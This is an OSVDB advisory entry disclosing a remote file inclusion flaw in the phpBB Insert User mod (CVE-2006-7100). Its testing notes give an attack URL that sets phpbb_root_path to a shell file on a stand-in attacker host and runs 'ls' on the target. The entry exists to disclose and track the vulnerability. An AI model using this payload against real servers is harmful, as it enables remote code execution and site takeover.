phpBB Insert User includes/functions_mod_user.php phpbb_root_path Variable Remote File Inclusion

2006-10-12T20:19:44
ID OSVDB:35449
Type osvdb
Reporter OSVDB
Modified 2006-10-12T20:19:44

Description

Manual Testing Notes

http://[target]/[path]/functions_mod_user.php?phpbb_root_path=http://[attacker]/shell.txt?&cmd=ls

References:

Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-10/0187.html Generic Exploit URL: http://www.milw0rm.com/exploits/2525 CVE-2006-7100 Bugtraq ID: 20493